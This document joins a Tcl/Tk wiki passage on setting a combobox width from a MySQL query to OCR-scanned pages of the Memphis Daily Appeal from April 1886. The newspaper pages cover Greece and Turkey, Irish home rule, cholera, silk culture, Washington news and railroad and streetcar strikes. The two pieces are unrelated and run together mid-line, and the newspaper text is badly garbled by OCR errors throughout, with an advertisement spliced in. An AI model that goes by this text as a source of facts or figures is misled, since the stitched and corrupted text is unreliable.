a tk::combobox width to display the longest tk::combobox entry for easy reading? :Question: I am trying to change the ttk::combobox background on linux to white when the widget state is readonly?Answer by Koen Danckaert: ttk::style map TCombobox -fieldbackground {readonly white disabled #d9d9d9}The wiki page Changing Widget Colors shows how to change all colors of the widget. In addition, it gives additional insight to the structure. Let's say you have a column of destinations you already have inside a table called item_in_out stored in some database called warehouse . You are supposed to record the destination of every item whenever and item is pulled out from a warehouse or store. So, as you record destinations, you don't want to repeat typing them. So we depend on the combobox autocompletion proc ComboBoxAutoComplete which is written on the top of this wiki page PLUS the database distinct listing of previously recorded destinations. To display the destinations list in a combobox and make it obvious and clear and readable, we'll have to set the destinations list combobox width to the longest string length of all destinations.Here I am going to show you what works and what does not work. I am going to use tdbc::mysql for database connectivity.The following proc gets distinct destinations and it returns them in a tcl list variable. package require tdbc::mysql #dbcon is the mysql connection command. tdbc::mysql::connection create dbcon -database warehouse -user root -password [email protected] -host localhost proc destinations { path } { #$path is the combobox widget path that you want fix its width set query_all_destinations "select distinct destination from item_in_out" set statement [dbcon prepare $query_all_destinations] set destinations_list [list] set max_destination_strlength 0 $statement foreach row { #the two lines below finds the longest string length amongst all destinations set single_destination [dict get $row destination ] if { [string length $single_destination] > $max_destination_strlength } { set max_destination_strlength [string length $single_destination] } lappend destinations_list $single_destination } #here we set the width according to the longest length found. $path configure -width $max_destination_strlength return $destinations_list }You might think that this way of calling the combobox is correct , then you're wrong. I say so because this can fool you because of tcl programming habits. here the combo is actually not defined or created yet. ttk::combobox .destinations_combo -values [ destinations .destinations_combo ] bind .destinations_combo <KeyRelease> [list ComboBoxAutoComplete .destinations_combo %K]The correct way is this. The reason is that the the combobox must be defined first, then you can do whatever you want. ttk::combobox .destinations_combo .destinations_combo configure -values [ destinations .item_io_labelframe.destination_text ] bind .destinations_combo <KeyRelease> [list ComboBoxAutoComplete .destinations_combo %K ]Please remember that after you insert a new record in the table item_in_out you'll have to re-update the destinations combobox just in case you have inserted a new destination. Use this line of code to do re-update. .destinations_combo configure -values [ destinations .destinations_combo ]
http://wiki.tcl.tk/15780
CC-MAIN-2017-51
refinedweb
2,401
54.32
1 MEMPHIS DAILY APPEAL FMD AY, AiKIL 2:5, 18SG. !LTID WEEKLY APPEAL itrnM r iiBMiiniou. D1IIT. ....410 (iri 6 W I H .. 1 I 2 no ..... 1 ui .-4 1 no 60 fttaa MOT Awflr MmlA - CALLAWAY A KEATING. M. C. Gu.T. I S.nd atreet. ). M. KT', I Vini-M. Ttw. MEMUI1S APPEAL. FRIDAY, " I I AFKIL 28, 1886. mate. Keep prsmlses free of perni cious exhalation, nd wa'cb over per tonal habits ; eepecially remember that intemperance ia a smiling Juds that with merry laugh and jocnnd glee in troduce cholera into the dwelling. Cholera, dirt and drink are members of the o&rno firm, and the two Utter are faithful abe tU n of the former. HIE NATIONAL CAPITAL. MIL TO INDEMNIFY THE CHI-HE-E FOB TULIK L0ES. Laud Frauds la the Went-Cinflrraa-tlons-Illg Damage Kult-b'rant Anniversary. CHECK TH WArATH. "Greece, but living Greece no more," tu the written aeertion of Byron early in the century, bat hi rordf no longer hold good. To-day Greece Is not only alive, bnt, to nee a eommot) phrase, "alive and kicking." She hat put her navy in full fighting order, and ha provided a strong sup ply of torpedo boats. On land ehe bas summoned her forces and put them on full war footing, and has been send ing them to the front, where the Turkf are prepared to oppose their at tack. All this time the European powers ar? demanding that she remain at peace, and their men-of war are watching the Greet men-of-war to pre vent them making any attack. Spito of remonstrances and threats from these quarters (lre?ce goes on with her preparation", and declares she will fl,i.h! spite of all the opposl'I n. And what is she fitting for? The t-eaty ot Berlin appointed certa'n torritory to Ureeca, be'ouglng to the Greece of former days, snd require;! Turkey to transfer it up only Greece seixs to ber. Turkey gave a portion, and is now determined to the rest. A telegram sent from Loudon on Wednesday said the Greek army on the frontier were becoming provocative and the Turks excited, so that any hour hostilities might begin. The Greeks mainly rely upon their navy, however, as the Turkish troops largely outnumber theirs, but as the ships of "the pow ers" are watching their war-ships, their navy, it is in a very peculiar po sition. It is believed that probably Greece ha encouragement from Rus sia, not that Russia is any special friend of Greece, hut is discontented about the Bulgarian settlement, and may intend in some way to make the Greek quarrel a mean of allowing her to interfere in the affair of the Udk ans. That the powers have a dread if war breaking out in the neighborhood of those provinces is evident by the extraordinary atop they have taken of sending their war-ships to keep the Greek fleet Inactive. THE ismil VOLCANO. Erig and is southing like a volcano before eruption on the subject 0 Gladstone's proposed Irish measures. II ever the Irish desired, as a little in stallment of revengu, to see same of its own agitation up letting England from end to end, it bas that degree ot vengeance to-day. Over the whole of Great B iUin there is commotion, dispute aud anxiety as to whut will be the outcome of the strife. Meet ings are held, orators are pleading fur one side or the other in every town. The whole press of the land is vibrat ing n:uler the Irish thrill. W.erevtr men cangrgate, in the drinking hona, in the clubs and in social par ties, hot and fevsrish discusiionof the Irish q neat ion goes on. That the pro posed moasur -s will meet with vigor ous and almost frantic opposition when Parliament meets again at ths) beginning o! May is evident. That both measures will have to nndergo important modifications appears certain, for while the English opposition object that too much is conceded, Irish supporters accept them only as a lave iiiH'allment of what th?j require. In the midst if all G'B'h'tone reinaire elm and ni-ured, while the enemies nf his policy are ob'g?,.l to admit thaf, now ro much h.i been fbrod by the Ministers of the C.'own, something fairly sathfiic t ry to tle Iiish would have to be done even it the Tories should ouce nvre got itt i power. As yot nobody h V?n nu,ki.ii in enough lo propone qtiiiitinf; Ireland by sending over there m re irVitVMits. The IiLti people are lion too united, too well organised, u.d hove leaders t o able and too pow etlul, for iiuliitJ aud hanging to pre V as in former days. Eng'aud's plan in Ireland has been to "divide and conquer;" hut now Ireland will not divide; like the Americans when in revolution, tiny know that in union lies fhe'r power. TIlU'ttOHD or DHEAIII Choleia 1 Wh that remembers visi tat one of the pint dos cot regard that word as ou i'f dread? II those wlioe niem- ry does not extend ai far bv.-k will ntid the description of t'je cholora eutvring Pari", given in Eugene Sno'a irmtdcr.'iiy jVte, they will know why dread and cholera visita tions go together. O.i the continent of Europa the awful secure his once more nndo its appoarance. It has in tnduted iUulf early, aud, like Grant, has "di! summer" ia which lo accom plish its dii tn lying ravages. Last y ar Frauce arid Spain were exposed t the horroia of the epidemic whore will it S'-.ci Ki victims this year? The probibilities aro against its reaching our chores t lis year, but thrb? who ore acquainted with cholera kuow that none can surmise w! at its djiugj may be. Often it defies a'l ex pEctsticna t.nd !e lpi to totalities where con & had thought a vihin'.ii n from it probHol. Ibi clolera is the choierj, aud as snch monarch of its move ment. We can, therefore, pily be actinjr prif.leatly if w"..0 tho gov frnm"i.'t qnaranti. " s! Pflnitiry jneciure. ''l-an, pi (It.-iih, ere- HlCCr.N IN ltK tVLTVB. The sixth annual meeting of the Woman' Silk Culture Atsocialion of the UniUd Stateswas held at Philadel phia a week ago. The report read by the president atated that there was an increase during the year just ended in the number of persons engaged in ilk culture, that there was an im provement in the quantity and quality of the ailk product and that a better system of turning the agricultural product into commercial raw ailk pre vailed. Mew officers were elected, all of them women. The statistics of the country show that, as the States grow older, there is an increase of the female population over that cf the male!. The statistics also show that there is a large increase of un married women. These facts Indicate that as the country grows older there will be an increase in the number of women forced to support themselves. The culture of silk is peculiarly wo man's wo k, and this branch of indus try should be encouraged for thoir benefit. In many portions of the Hdiith considerable inter est has beun taken in silk culture, and sn aunuol'y incieadng number of men, women and chi'dren have engaged in planting mulberry trees and in raising silkworms. As yet but little has been accomplished in the South in the direction of the manufacture, the principal reason be ing that the supply of cocoons Is yet too (in ill and precarious to justify it There is reason, however, to believe that silk culture will soon becjme leading industiy for women in the Southern Htates. The Interest in silk culture has grown steadily and with increasing promise. In 1850 there were slxly-sevua silk manufacturing establishments in ths whole country, producing goods valued at $l,fl0!),478. By 1HW the number of factories had increased to 130, and the value of pro ducts to $6,607,771. From 18E to 1S70, the decade of the war, the num ber of factories decreased, but the value of tho output increased again to tl'-',210,e02 in 1870. In the census, year of 1880 there were 382 establish ments in the United States, whicu produced finished goods worth $34, 610,723, or 38 per cent, of a'l the silk goods consumed by the nation. As by far the major pirt of the raw material wd in this native manu facture was imported, and as there doej not appear any good reason why cocoons and reeled silk should not he as well and as cheaply supplied here as abroad, it is not difficult to infer a promising future for our home silk farms. It is worth noting that in de voting their attention to this subject a majority ( f our silk experimenters in the South fancy that they are pion eering a new Southern industry. Ths tac'. is that the production of silk was among the very earliest industrial ef forts of the colony of Virginia. I i 1609 King James of England con signed eilk worm rgge t Jamestown, which failed to arrive, owing to ship wreck. Later his mujesty succeeded In supplying the colonies, and tbe production was stimulated at va rious times afterward by fines for not planting mulberry trees, or by bounties for introducing coco ans and raw eilk. A Swiss colony, which sctt'eil in South Carolina in 1733, made some progress in raising silk, and there Is rooord of the exportation oi 251 pounds of raw silk from North and Sjuth Carolina bet wean 1731 and 17G5. Hut it cannot be said tba'. tho industry flourished. The couditions wore favorahlo to au extensive pro duction, 1 ut tho pjllcy i f the mother country f jrbade colonial manufacture, in the interest of British weavers, aud subsidies nd finos were alike iasulll- ciout to keep it ou its legn. Eirly in the eighteenth century silk culture on the Mississippi wis a part of John Law's Mississippi Company scheme, a..d, in 1817, eggs aud seeds formal berry trees were sent to New Orleans In aud about the city a good many trees were grown and tradition has it tuat the pros pects for the industry were bril liant until the collapse of the "Hoath Sea bubble" produced a col" laps of all the infant interasti of the early tow a. Silk culture was intro duoed in Georgia in 1732, and made some progress. Queen Caroline Is al legod to have worn a gown of Georgia silk on a certain state occasion, and 1 Bavarian colony, near Hivannah, ap pear t) have produced quite a good dea' of raw silk, as in 1771-72 it ex ported 873 pounds of raw silk to Eog laud. In 17o0 Georgia produced 6300 pounds of cocoons, and 20,COO pounds in 1766 From 1750 to 1754, the same col my export h! raw eilk valued at 18SC0. Il is not necessary at this titin t write of tin mnlherrvanddlk worm ex 'ite nent of a lat'r period. It 1j hore intended only to p.iiut the (ai tint the industrial phenomena which uiark the orcaiiaition and early hU.iry of the No foul n, are largolv repetitions on a greater eeile of the industrial phe nnme'ia of o.irly days in tho old colo ii..l Sjutti. The p or Iktle Virginia hloomry whose workmen wore mas sacred by the InJ h'ih in 102- has no ble d-?condant in thi gui -a ol great furnac e rolling-mills all over the South, and let us hop that Southern ell oris cf the present day to promote tho silk in lus ry may result in tho es tablishment of au intwttt beating a liko creditable relitioa to the histor ically Interest bnt otherwise nnim port int 1U culture of the colonists. WimnimiTON, April 22. The Solici tor of theTreamiry has instructed the UniU-'l Mates District Attorney at Sun Francisco, Cal., to bring suit against the Sierra Lumber Company to recover about !2,218,XX) damages, arising from tbe conversion of timber and lumber taken from public lands. The special agents of the Land OHice nave ooen ineirucieu 10 render me District Attorney all possible aid in pre scenting the suit Uarmatlaa. WAsniMOTON, April "22. Confirma tions Chas. JK. Gross, Governor of Now Mexico; W. 8. Kneccrans, Regis ter of the Treasury; K. E. Withers, Consul at Hong Kong. Registers of land Offices J. I. Beth una, Los Angeles, Cala ; W. K. Ramsey, Camden, Ark. ; W. T. Bur ney, Oregon City, Ore.; C W. John ston, Kosebury, Ore. Receivers of Public Moneys J. R. Thornton. Camden, Ark.; h. James, CnrsonCity, Nev.; W. II. liickford, Shasta, Cula.; J. T. Outhouse, La grurido, Ore. Collectors of Customs W. T. Car rington, Teche, Iji. ; J. J. HiguiiiH, NnU-hes, Mi s. ; I. II. Pouoher.OHWi'iio, N. Y.; O. L. Breckley, Salina, Tex. Indian AgentH-J. S. Ward, Mitusion Agency, Colo.; W. II. Black, Sac and Fox Agency, la.; J. Mi-Laugh in, Standing Rock, Ink ; J. T. Dowd, Osage Agency, Ind T. . A. T. Wood, postmaHter, Corsicana, Tex ; J. T. Gathright, surveyor of customs. Louisville, Ky. ; ). R. Pear son, Indian inspector; W. Stupleton, inciter and rufiner of the mint, Den ver, Colo. Arrival or tbe Hew VblaMcntBlnler. Wanihsgton, April 22. Chang Yen Woo, the now I'tunese Minister, ana his suite, arrived in the city to-night The v inister and his party wore met at the dejiot by the retiring Minister and the attacr es of the legation and were escorted to the Embassy in car riajea, after which the ex-Minietrr and his suite ret 11 mod to the hotel. where they will remain while In the city. , Hisljr-Pnnrlb Alvrr of (he Blrlk of iiru. Uraat. Washikoton. April 22. The sixty- fourth anniversary of tho birth of Gen. Grant will lie celebrated" at the Metropolitan MuthodiBt Episcopal church, in this city, Tuesday evening, April 27th. Chief Justice Waite will preside, and addrusses will be made by Senators Brown, Sherman, Ixignn and Evarur, ex-Gov. Lsng of Muhm chusetts, Gen. J. S. Negley of Penn sylvania, G-'ii. Burdetto, commander-inchi- f of the Grand Army of tho Republic, tho Kuv. J. P. Newman and John F. Sjience of Tennessee, 'lhe Presiilent and Cabinet have been invited, and various jwsts of the Grand Army will be present. The anniversary will take placo under the uuspircsof the friends of the Grant Memorial University of Athens, Tenn The institution was formerly known ns tho East Tennessee Wi-slevan ITn -versi y, hut the Hoard of l)irectors amended their charter, changing the name of tho college to that of the Grunt Memorial University. Tliis was done because Gen Grant made the flr.t cash donation for the build ing of the school when it was or ganized in 1867, and because the friends of tho General in the Central South desire to perpetuate his memory by establishing a living monument to un rimim. I.nnrt frauds la tbe West. Whiiim.ton, April 22 Commis- Hionor Sjiarks of the General I -and Otiice is completing the organization of a siiecial board of review, the du ties of which will be to examine and report to the Commissioner upon a'l a indications for patents to jmblic lands. Its examinations will have spvciul reference to detecting evi dence ot trand. Tue board win con sist of fitt on or twenty ot the more expert clerks of the Goneral Land OlhVe, detailed for the sjieciul service, and such cases as receive a favorable report from this board the Commis sioner will certify to tho President for imtei.t. The field force in tho West hns recently been increased by twelve newly uipointed special agents, eight ol whom will give their spei ml atten tion to the detection of fraudulent 011 tries. The other four will look aftor the interests of the government in timber trespass cases. The Coinnris- woiier says that ly increasing the em ciencv and thus the vigilance of his force both in the field and in the office, he hopes to accoiujilish much that would have been accomplished had his order of April 3, 1HS5, been allowed to stand. Iho ( hidfke IndrnifiitT Hill. Wamiinhton, April 22. Senator Morgan, from tho Committee on For eign Relations, reported to the Senate a bill to indemnity the Chinese for the losses and damages inflicted upon them bv the ri tere at Rock Springs, Wyo.t., in September last. It au thorises the President to designate tint to exceed th'ee oliicers of the 'I'nited States lo investigate snd take the testimony of witnesses as to the nature and extent of the damage done to lhe jicrsons and jiroperty of the Chinese, and in connect 011 there with they may consider the testimony already taken and reports mailt- sub ject to the cross-examination of the witnesses, if deemed necessary, and such other proofs as may be submit ted to them by the government of China. They ure required to report the es iniatc oi the damages sustained by each jiersou and submit the testimony to the Secretary of Smte within six months, which time may be extended six mouths by order of the Presiilent, and the same shall be examined by the Secretary of Slate, and thereupon the President aha 1 award to each person injured tho sum that he shall consider to be just in view of the evidence and re port presented to him. The aggregate amount so awarded by the Presiilent, not exceeding 15ii,000, shall be paid by the Secretary of the Treasury to the Chinese Minister at ashr iiigton, in full satisfaction ami dis charge of the injuries to per sons and rropcrty inflicted npmi subjects of the 'hini'.se Empire. Th morrow t'lilnrao K-ll Wakhimiton, April 22 The House Committee on Foreign Allairs to-day reconsidered the vote by which a fuvorab e report was ordered on the Morrow Chinese bill. Representative Morrow and the other members of the California delegation are opposed to the amendments made to the bill in committee, and especially to that one whiih says an v master of vssels shall not be liable to penalty for briuiring nnv jerson into the United Stat. who is entitled to come to this country under existing treaty stipula tions. They say that the bill i really an abrogation of the Burlingame treaty, and that if the amendment were adopted it would defeat the en tire 1 urpose of the bill They also said they would oppose the bill in the House "if reporU-'l in its present shape The bill will be fu ther con sidered in committee next Tuesday. Simula IimU MMalon. Washington, April 22. The Senate in executive session to-day took up tiie cae of Chas. R. Pollard of Indi ana, nominated to he a Judge of the Supreme Court of Montana, vice den. Coburn, susjcndcd. The case was reported adversely from the Judiciary Committee, and Senators Edmunds and Hoar sp- ke against Pollard. Pi-1- lard was a Uonleilcraic ana uoourn was a Union soldier. Many allega tions concerning questionable trans actions in which Pollard took part, when Assistant District Attorney in Indiana, were discussed. Senator Voorhoes began a speech in favor of Pollard, but gave way for an adjournment. Senator Morgan oflered a resolution, which was not acted on, to remove the injunction of secrecy from the Weil and lAbra Meiican treaty, re cently rejocted, Biid the accompanying papers. AdalleratUn or rood Product. Washington, April 22. The House Committee on the Judiciary to day laid on the table a number of b lis to prevent the adulteration or imitation of food products, this action was taken for the reason that the commit tee believe tho bills to be unconstitu tional so far as they affect the several States, and so far as they affect the District of Columbia, they are not properly within the province of the committee. . BPsnlittioB flftt Trslllo la Fraud. Bleut Duller. Washington, April 22. The House Comuii!t" on Aiueuiturs to-day an thorized Chairman Hatch of Missouri ti report favorably a bill to regulate tin flic in fraudulent butter, which is substantially identical with that framed by lhe American Agricultural and Dairy As ocution. ice bill im- iiojes annual laxss as follows upon those enacir d in tbe business: Man ufacturers, 600; wholesale dia'ers, S4K0-. retail dealers, 148. Manufjc turers of oleomargarine, who have not paid tbe tax. shall be fined $1000 to J5'.!U0 in addition to the tax; whole sale dealers. $03 to $1000, and retail dealers. $-30 to $500. Jtll manufac turers oi oleomargarine shall put np their product in wooden packages, atftmpTd snd branded under regula tions preccribed by the Commissioner of Internal Kev-'nue, ana dealers snail bs allowed to sell imi'a'ion bu't-ronly from packages so branded. Violation of this provision shall be punishable by a tine end luipnsnnmnut. iwery nackase shall be labeled with the number of the manufactory. Neither the etamp thereon, nor the package shall be removed, reured ordejtroyed under penalty cf i50 fine. Manufactur ers Khali pay a tx of 10 ctnia for each pound of oleo margarine manuf 'Ctured by them, and if any in inuueturer sells or r3 c-ives for sale or roneutnptou any 0 eomargarine on which the stamps sre not affixed, he shall be liable to tine and imprisonment in additcn 10 tte tax. Imported cUomargcrine (h ill pay an internal revenue tax of 15 cents per pound in auaiuoa io ine import duty. Every person who pur- chares or receives for fa'e oleoraar iiarine not properly branded, shall be liihle ti- a penally of $50 for each offense, and to a penalty of $110 in ad dition to forfeiture nl te article lor receiving ole margin-.- from a man ufacturer who uhh no', paid the tpei.iul tax. F.adulent. use or posses sion of oleomtrpa inn -hill be pun ishable by fine aud imprisonment. Scientists may be appi inted 10 de termine whether nnv ariicle is sub-, ject to the t x provided. Also, whether a jy oli margarine which U intended for fond is dtlsterious to public healih. The former shall be fi failed in case the tax stamp is not tflixsd, and the latter in ciee it is de cided t be injurious to health. Oleo margarine must not be exported with out payment of the tax provided, but shall be labeled "Oleomargarine" in large letters. Any person engaged in the oleomargarine business, who de frauds or attempts to defraud the United States in connection with the buainesp, shall forfeit th fait jry, man ufacturing apparatus and stock, and in sil.lilii n bn liable to fine and imprisonment.- Rigid penalties am er jvidcd for all infractions of the law. The bill shall take eflect ninety days alt its paa.ige. TIIE LAKk? SHORE STRIKE. FUTILE ATTEMPT TO STAKT TRAINS A'" CHICAGO. Kefosal of lhe En?. 'neers to Take Out Tlielr Engine. An Ex elfin j-cem'. Chicago. III.. Anril 22. 'Ac special train over the Lake Shore road, con taining the deputy-sheriffs aid new switchmen, bound for the yards at Forty-third street, made a ston at Toirty-niutli street. Here a commit tee of the striking switchmen awaited on Superintendent Arasden and asked him to allow one ot the men to go into the rear car and address them. In ac cordance with the request Tom Col lins got in the car and spoke as follows : "We want you men to hear enr side of this matter. You have heard the company's side and you should hear both sides. Come over to our hall and hear us, and if you do not want to go there, fix any other place. Come out and talk it over. This is a question between capital and labor and the time Mas come that the con flict bas to take this shape. We do not want to injure the company's property, but we want our rights. Collins then lrft the car, followed by three of the Imported switchmen, and tho cars were surrounded by the strikers aud their friends, who us d every argument they could to per suade the switchmen to leave their cars. Up to 2 o'clock, in all seven men had left, some going through the windows and some out of tho doors. About 2000 men surrounded the train at Root street. The crowd increased momentarily until fully 5(X) J men were in the yards. TUB CRITICAL MOMKXT was at 2:110. Engine No. 158, with Engineer Mid Ca !dy, catni out cf the round house clanuir g iti boll loudly. Ten deputy sheriff gu-adid in front, rear and sides. Bufore the engine reached the main track, the deputies we.realims' ht in tbe mass of ex cited men who crowded the tracks. Tom Collins mount 3d the engine and began talking to the engineer. Ths wheels soon stopped, when Co lins was heard to say: Be kind eoouuh not to do this. You are no capitalist, For God's sake run that engine back fir ns laboring man. Doit. Will you T The engineer reached for bis lever the great wnee's reversed, and the engine started back to the lound-house, amid deafening cheers from ths switchmen and their friends. When oppo3ite the tank Superintendent Wright got on the engine aud talked with the engi neer, while the engine stood still and there was a silence over the great crowd. Caddy shook bis bead and ran the engine into its stall. Superin tendent Wright was ssked if he could get a man to run an engine out, and said: "I will try again. I think I can. . Nmmw Itnuur KIMZSiTfl TAILOR, DEAFER & IMPORTER ZTo. 38 MAJDISOIT STREET, Cordially lavites isspectiM of his Larrs, Tmh a4 Varied ' Sarin ui Issiinr Stock of Eaelita. Freck and Gcnnaa "VT ortteia, Cawrmrres sad Suiting, aomprisiag thi Latest Dcaijrns tni Finest Textares i Gcntlemeas Wear. 19 Samples anal Fricea appIicatiM U Umm wks kara left aessarca. A L iog men, and this opportunity is doubtless now presented. All day to day J. L. Monaghan, chief of tbe Aid Association, was busy among the strikers, and it is repotted this even ing that a committee wonld meet for the purpose of considering tbe divisi bility of making ths strike nrictly union affair, and making use of all the power in the organization to gain the day for tbe local strike. The New York Sugar Kiofa. Hdntbb's Point, L.I., Aoril 22. Th9 fitihiing between ths police and tbs Btrikers, which began about 1:30 o'clock p.m., was quelled about 3:10 p.m., when reinforcements from tbe Sixth, Fourteenth, Eighteenth and Kixteen's Precincts arrived, and the Seventh Precinct men, having been supplied with their night clubi", were better able to cone with the strikers. This evening everything is qniot, though imther trouble is expected be fore m ruing. A cordon of poli :e sur rounds thu Havemeyer sugnr-house, keeping the strikers tt a fate distance. Most cf the strikers have been drink iug all day aud are intoxicated. They held a prolonged m-e iog and ap pointed a committee to demand $1 25 per day for all laborais, and ten hours to constitute a day's work. The llave meyers refused to receive any com mittees, bat said they would treat with the men individually. There are about twenty employes at work in the sugar-house, who are boarded and lodged on the premises, a stock of pro visions ana cots naviug oeen proviueu. The policemen are also fad on the premises. i,veiy thing remained quiet up to midnight, a large force of police remaining on duty. Uavemeyer & Co. announce that they will in no caw re employ any of the strikers. It was resolved to repeat the demand, and if it is not granted on or btfore tbe 1st of May tbe moulders will strike. Tbe members of the anion number about 3500. NEWS TN IUUEF. Augusta, Ga., April 22. Washing ton county, one of the largest in the State, has voted tho dry ticket by a majority of 242. Richmond, Vs., April 22 -The local option election 111 Fredericksburg to day resulted in favor of granting licenses, by 210 major, ty. Louisville, Kv., April 22. -The National Tobacco-Works, employing 30 hands, voluntarily a'ojtted t tie eight-hour system to-clay without re ducing pay. Cleveland, O , April 22.-The Ohio State and National Convention of the National Reform Association, is in ses sion at Wooster, O.. the Hon Felix R. Rm not of Pittsburg, presiding. Cincinnati. O., April 22. Florus B. Plimpton, who has been on the edito rial staff of the.'omtToiaI (iasf'.lt since 1800, died to-night of a complication of diseases. He was fifty hve years old. Beverlv. Mass . April 22. Kdward T. Shaw, who for twelve years has carried the mail between the local poslottice and the railway station, was arrested to-d-y. He confessed to hav ing systematically robbed the mails for feve al years, taking between 30(10 and WltlO letters and obtaining upward of iloOt). Cleveland, O., April .".'.-The city ministers, headed by Bishop Bedell of the Kpis opal Church, are preparing to boycott the Sunday secular news-iiaiw-rs. Confidential circulars have been issued to clergymen and all have In-en urged to join the movement and denounce Sunday apeiKl'rom their ptilits May 2d New York, April 22. -There was a spirited contest for the position of Deputy Command) r of the Depart ment of New York at the afternoon session of the Grand Army of the Re public, resulting finally in'the election of .1 I Sayles of Rome. For Senior Vice-Commander, Charles A. Orr of Buffalo was chosen. C: nrlcston, 111., April 22.-- Follow- ing the arrest last night ot I-.mma Fleetwood, charged wiih complicity in the murder; of her mother and father hmt April the announcement is made that the two sons of the mur dered couple, one of w hom is in Kan sas and the other in Washington Ter ritory, will be brought back if jwssi hle " When arrested, Emma did not exhibit any surprise, merely saying she was ini-cit Aid for tbe HU Loala Strike. St. Louis, April 2?. The Executive Board of the Knights of Labor re ceived to-day, up to noon, for tbe strikers' fund $3100 in drafts, and telegram from the East stating that $20,000 had been forwarded from sym pathizers in that part of the country. A Verdict or Not UniHjr. St. Louis, Ad-il 22 The i arv before whom tbe case of VV. W. Withers, charged with placing dynamite on the track of a street railway during the strike of some months ago, causing se vere d.-msge to tbe company a prop erty, returt.ed a verdict tday of not guilty. Another Strike n tbe Nonthrra Pa cini-. Houston, Tex., April 22. The yard- men of the S iuthern Pacific railroad struck to-day, for what cause is not stated. The strikers number abont fifty men. Freight traffic on the lines has been suspended since the trouble -begau. Strike at Hum Clljr. Kansas City. Mo . April 22. Sixty men employed m truckers, stowmen, receiver and checkers at tbe Missouri Pacific freight depot struck to-night, demanding more pay. Tbe etrikeia claim that it is a movement in their aid. They eay it will seriously inter fere with busineis hern unless new men are secured to fill the vacant placss. KiKht-nnr THS OFFICIALS OF TUB COMPANY had repeated deferences with indi vidual member and with the commit tee of the stiikerj, bnt no arrange ment was arrived at. On t ie outskirts were many women in carr.as's who waved their handkerchiefs when the ergines bacxed lnfo toe stall again. The committer ol the strikers keut at work at the switchmen who had been imported by tbe cumpany. They argued with tbm, they b'tgged them to show themselves men and get out of tbeenr. They told them: "Thecsstle yon are in pow; will tumble down ard the ra:In a I tnngnates will be bnried with yon in the ruics." "Have you gt a f-mily? So have we. Here s S 1 r vnu to come out. and here's $10 more," and tbe bills were put, np be'o-e 1I10 window. "If you don't conic wi'h us you can go to tue uttermost pa t of the earth and the odium will f illow you." TBE ATTKMPT TO STAKT TRAINS ABAN DONED. Up ti 4 o'clock the railroad officials were endeavoring unsuccessfully to get man to run an engine on tbe main track, and the strikers were laboring with tbe switchmen to try and make them give up. At 5 0 clock bitten ot the new men bad pined the sinters, and the sunpoutton then was that they would to a man join the strikers. Six of the strikers were a -rested on the warrants sworn out by the company. At 6 p.m. the Sherifl ordered the deputies to return to the city until 0 o clock lo-iiiorrow morning, the r ill road company having decided to make no further attempt to run trains until that time It s. ems impossible to in duce engineers to take their engines out against the w slies of the strikers. A reporter who talked to several of the engineers claims that they are afraid to do so, and k is said the rail-1 road officials are uncertain what move to make next. Everything is quiet at present STRIKERS INPKIt AHKGsT. A deputy-sheriff arrived in the city tlrs evening having in charge five strikers who had ben placed under arrest by the Sheriff's posse. They were arrested on State warrants sworn out before a justice of the peace, charging "conspiracy to maliciously and feloniously prevent the free and safe passage of trains of freight cars." The prisoners were taken to the Har rison street police station and locked up. Business at the custom-house was very dull to-day on account of the strike. Some of the employes were of the opinion that there were nearly fifty loaded cars due in Chicago nowout on tbe Lake Shore somewhere between Chicago and Elkhart. The cars are very valuable, and contain goods for about all the importers in Chicago. THROUGH B1SJNKS8WAS VKBV PCLL at the custom-house. Many of the iiianeetors wen1 kept verv bllSV lit the stock-vards looking for shipments of meat for export from the packing and canning houses. The inspectors say that somo of the exporters seem to feel that there is going to be a general strike on the railroads centering here, and a rtsulting shut down of manu facturing establishments. The export ers are hurrying off what stock they have 111 order to meet foreign con tracts and not be caught if the strike affects any other Eastern roads. A still larger' force of inspectors and as sistants will be sent to the stock ys'.rds to-morrow in answer to the de mands of exporters. EXTENT OF THK 8TBIXB. It is s.iid this evening that the etiike has rrmutWtions thst are not fill y un deretojd by any bnt the mn them selves, and it is n": Rt a'l improbable tht ail the switchmen in the country, a l.nr tlinHM rn-iween here and lhe se-itioard, t-tand resv to aid ti e Lake Shr men hv striking whenever crll.-d on to do "so. U has been t er sifetently deuied that this strike w undwr i'om direction of the Switch men's Mutual id Association, and this hipv beret fne have bien t ue. But inform .1. ion was gained to-dsy tba. the Aid Association won'd be only ti tilalof sn oppor tunity to. take up the eic'e cf the Btnk- TbeJiew York Street-far Strike. New Yobk, April 22 A represent ative of the Executive Committee ttates that the board has determined that the strike shall be confined to the Third Avenue road nnhss in caw of a combination of all the roads anainst tbe strikers. The other reals are warned bv the strikes to keep away from Third avenue. During the strike the men wib be paid from tbe funds of the association as though they were at work. Thequettoa of a general tie no will be hr d in abeyance. A drunhen man tried to raise a dis turbance with a conductor about noon to-dav onaTHrd avenuecar. Acrowd grathered and tioka hand. The police used tr eir duos to q'leu tna low ana butt ed the druukenfelloff to the lU- tion-houee. Another eld rutin, an old driver, was arrested and locked up for assaulting drivers and conductors in the employ oi the road. The Brand inrv spent the day in considering tns cases t f the Third Avenue strikers, who were arretted for riotire on Tusedav. and those who have beon earning on the bakers' and other boycotts. It is understood thst a number of indictments were found, and that on Monday investigation will be made into the methods em ployed by the Executive Board of the Empire rrotective Association in or dering a general tie-up ol the city street-car lines. It is thought indictments can be found under the law sgainet conspiracy to intimidate A bovcott has been declared against 1 charitable institution, which furnishes work to a number of crippled dots in the manufacture 01 brushes. loeDoy- rntt in declared by tte Brush Makers1 Union, hecanae the wotk comes into competition with that of members of that union. The immediate result of the boycott has been to secure a large number of orders tor toe cnppiea work. Trie cars stopped mooing and the stables were c oied at t :3U o cioce io nieht in order that the pcle might gain more rest.. Twenty officers were left on fill ird at the depot. During tho day fifty-eight cars were running, To-morrow the superin tendent inleudt lo run seventy-five cars on the Thiid avenue road, and will begin running ears on the One Hundred ami 1 -nrv fi'th street line, and pts ilily some ca ble c.irs. All the ncvrly-hired men are lodged end ftd by the company in the depot building, where ihnre are accommodations for nearly 1000 men, one of the directors cf tbe road eaii this evening. There will be no meeting ot tbe directois until the rpgnlar monthly meeting. They have made up their minds as to their coarse of action, and will not chnngn it. To-night the pickets of the strikers aro on duty a'l along Third uvenue. The strikers had a large meeting to n ght, and afterward the representa tive of the Executive Board detailed the system of organisation for enf ore ing tbestrike. Heeaid: "All of otir men are with ns. Not ore has gotie back since the strike began. AU of our men who have asked have re ceived their full daily psy. Twenty of the company's new men have left to-day anil most of them have joined the organiration. More will came out in the morning. Over twenty horses have died in the stables fir want of proper care since the strike began, end s number of them have been in the yard since Saturday. Seventeen . dead horses were lying tham tn Hnv. The company has no hone-shoere, aid have Doen seuaing oat hows witbmit shoes, en 1 